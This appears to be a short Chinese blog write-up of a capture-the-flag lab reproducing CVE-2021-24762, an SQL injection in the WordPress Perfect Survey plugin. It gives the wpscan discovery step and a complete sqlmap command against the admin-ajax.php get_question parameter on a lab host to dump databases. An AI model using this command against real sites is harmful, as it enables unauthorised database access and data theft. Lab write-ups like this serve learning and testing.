首页 > 其他分享 >CVE-2021-24762 复现

CVE-2021-24762 复现

时间:2024-09-17 10:50:59浏览次数:9  
标签:sqlmap admin question -- 2021 exp 24762 CVE

一看是个wordpress,看了下版本6.0没洞,直接扔wpscan扫一下
发现了个插件
image

一搜发现perfect-survey在1.5.2之前都有洞,直接搜exp打.
上官网找了个API重扫一遍,直接给出了CVE号!
image

直接找个sqlmap的exp跑一下,注意第二个位置选n来设置cookie

sqlmap  -u "http://eci-2zeg18fce0yxpb7pebgq.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=get_question&question_id=1 *" --dbms=mysql --dbs

成功得到数据库名.最后在数据库中得到flag
image

标签:sqlmap,admin,question,--,2021,exp,24762,CVE
From: https://www.cnblogs.com/meraklbz/p/18416979

相关文章

  • P7831 [CCO2021] Travelling Merchant
    妙妙题。题意给定\(n\)点\(m\)边的单向无自环图,每条边有权值\(r_i,p_i\),表示要经过这条边要有至少\(r_i\)的收益,经过这条边之后会获得\(p_i\)的收益。对每个点求出从该点出发能不停止的行走初始需要获得至少多少的收益。无解输出-1。\(n,m\le2\times10^5\)分析不......
  • 总结:1037 - CSP 2021 提高级第一轮
    我的提交记录与结果以比较为基本运算,对于\(2n\)个数,同时找到最大值和最小值,最坏情况下需要的最小的比较次数为()。\(\textttA\).4n-2\(\textttB\).3n+1\(\color{#5eb95e}\texttt{C}\).3n-2\(\color{#e74c3c}\textttD\).2n+1【解析】:首先先将原数组两两分组。每组......
  • 【网络安全】漏洞挖掘之CVE-2019-9670+检测工具
    未经许可,不得转载。文章目录漏洞介绍正文工具漏洞介绍CVE-2019-9670是一个与ZimbraCollaborationSuite(ZCS)相关的严重漏洞。ZCS中的AutoDiscover服务存在不正确的XML解析处理,该漏洞可被利用来注入恶意XML代码(例如外部实体注入(XXE)攻击),从而导......
  • OpenSSH 远程代码执行漏洞(CVE-2024-6387) Ubuntu22.04 和 centos7处理方法
    这是文档,不是脚本,请一行一行复制粘贴执行,不用批量自动执行下面是Ubuntu22.04和centos7的处理方法,其他系统可能需要适当调整#!/bin/bash#========================================================================================##Ubuntu22.04升级openssh#......
  • CVE-2015-5254(ActiveMQ-反序列化漏洞)
    漏洞描述编号:CVE-2015-5254影响版本:ApacheActiveMQ5.13.0之前5.x版本CVE地址:CVE-2015-5254漏洞原理:该漏洞源于程序没有限制可在代理中序列化的对象。远程攻击者可借助特制的序列化的JavaMessageService(JMS)ObjectMessage对象利用该漏洞执行任意代码复现环境windows,doc......
  • 资源分享 Excel面板!中国科技统计年鉴面板!(1991-2021)
    《中国科技统计年鉴》是国家统计局社会科技和文化产业统计司和科技部创新发展司共同编辑的反映我国科技活动情况的统计资料书,收录了全国31个省、自治区、直辖市以及国务院有关部门上年度科技统计数据。全书内容分为九个部分。第一部分为反映全社会科技活动的综合统计资料。第......
  • 【2024潇湘夜雨】WIN10_LTSC2021_21H2.19044.4894软件选装纯净特别版9.12
    【系统简介】=============================================================1.本次更新母盘来自WIN10_LTSC2021_21H2.19044.4894.2.全程离线精简、无人值守调用优化处理制作。部分优化适配系统可能要重启几次,即使显示适配失败也不要在意,可能部分优化不适用。3.OS版本号为19044.48......
  • DataGrip 2021.2.2如何导出.sql文件
     目录Blue留声机: 导出文件:1、点击要导出的table,选择Exportwith'mysqldump'2、选择一下数据库备份数据的路径,选择导出sql文件存放的位置导入文件: 概览:1.第一步,进入运维管理端,通过命令行进入数据库2.第二步,切换数据库3.第三步,导入sql文件source无法导入sql文件......
  • Apache OFBiz远程代码执行漏洞(CVE-2024-38856)
    漏洞简介ApacheOFBiz是一个开源的企业资源规划系统,提供了一整套企业管理解决方案,涵盖了许多领域,包括财务管理、供应链管理、客户关系管理、人力资源管理和电子商务等。ApacheOFBiz基于Java开发,采用灵活的架构和模块化设计,使其可以根据企业的需求进行定制和扩展,它具有强大的......
  • 2021 CSP-J 完善程序3
    2021CSP-J完善程序31完善程序(单选题,每小题3分,共30分)(矩形计数)平面上有n个关键点,求有多少个四条边都和x轴或者y轴平行的矩形,满足四个顶点都是关键点。给出的关键点可能有重复,但完全重合的矩形只计一次。试补全枚举算法#include<stdio.h>structpoint{ intx,y,id;}......